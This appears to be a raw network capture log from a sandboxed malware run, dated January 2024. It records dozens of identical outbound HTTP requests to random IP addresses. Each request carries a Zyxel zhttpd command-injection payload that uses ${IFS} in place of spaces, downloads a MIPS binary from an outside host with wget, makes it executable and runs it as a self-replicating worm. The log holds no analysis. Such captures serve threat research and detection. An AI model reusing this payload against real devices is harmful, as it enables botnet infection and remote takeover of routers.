                                                Jan 12, 2024 18:24:25.587522030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1715192.168.2.1348740169.26.53.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587558031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1716192.168.2.1359656206.106.117.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587608099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1717192.168.2.1350064180.47.242.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587637901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1718192.168.2.1355626148.229.120.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587682009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1719192.168.2.135736686.165.114.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587735891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1720192.168.2.134417244.214.64.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587754965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1721192.168.2.1350022178.192.109.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587791920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1722192.168.2.1342980148.250.234.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587845087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1723192.168.2.1357224191.121.72.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587903976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1724192.168.2.134435436.104.197.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587938070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1725192.168.2.1358020183.220.73.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587970018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1726192.168.2.1351032206.24.174.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588073015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1727192.168.2.1336832221.13.206.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588114023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1728192.168.2.133971881.64.239.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588146925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1729192.168.2.1357818108.11.11.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588207006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1730192.168.2.1343618167.138.137.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588259935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1731192.168.2.1358766107.0.64.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588337898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1732192.168.2.1349328110.142.30.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588395119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1733192.168.2.13374588.44.155.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588406086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1734192.168.2.1349514199.49.119.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588459969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1735192.168.2.1356570128.130.199.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588490963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1736192.168.2.1336012179.3.208.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588490963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1737192.168.2.1347232153.26.210.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588536978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1738192.168.2.1342674101.151.104.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588594913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1739192.168.2.134539674.18.106.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588637114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1740192.168.2.135117289.98.152.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588686943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1741192.168.2.1334156157.176.97.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588721037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1742192.168.2.1345162141.110.189.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588764906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1743192.168.2.1335058131.206.165.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588802099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1744192.168.2.1360194210.78.168.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588870049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1745192.168.2.1347198169.221.230.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588891029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1746192.168.2.1333572196.83.82.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588923931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1747192.168.2.135432241.229.84.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.588958979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1748192.168.2.134728497.235.195.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589010954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1749192.168.2.133300882.100.200.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589056015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1750192.168.2.134737858.95.36.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589085102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1751192.168.2.1336972142.27.181.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589139938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1752192.168.2.1345776107.44.230.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589171886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1753192.168.2.1335030210.44.217.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589200020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1754192.168.2.1350870201.82.33.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589236021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1755192.168.2.1345694168.146.237.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589271069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1756192.168.2.134393017.131.227.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589303017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1757192.168.2.1358098210.204.250.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589328051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1758192.168.2.1345634163.111.166.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589364052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1759192.168.2.135597290.141.120.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589411020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1760192.168.2.1358666131.243.124.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589431047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1761192.168.2.1335096137.216.251.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589468956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1762192.168.2.133342417.115.87.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589497089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1763192.168.2.1333296198.131.194.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589534044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1764192.168.2.134981492.77.159.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589570999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1765192.168.2.1351374100.231.176.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589598894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1766192.168.2.1352722105.169.9.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589673996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1767192.168.2.135957046.217.78.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589704990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1768192.168.2.1345010200.36.29.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589740038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1769192.168.2.1337682174.138.231.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589827061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1770192.168.2.135581262.52.186.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589838028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1771192.168.2.1357042175.153.41.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589874983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1772192.168.2.1336510222.238.215.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589906931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1773192.168.2.1360830179.78.175.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589929104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1774192.168.2.1336246106.103.111.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.589975119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1775192.168.2.135853252.127.19.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590027094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1776192.168.2.1360630152.71.166.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590045929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1777192.168.2.135070446.235.70.148443
                                                TimestampBytes transferredDirectionData
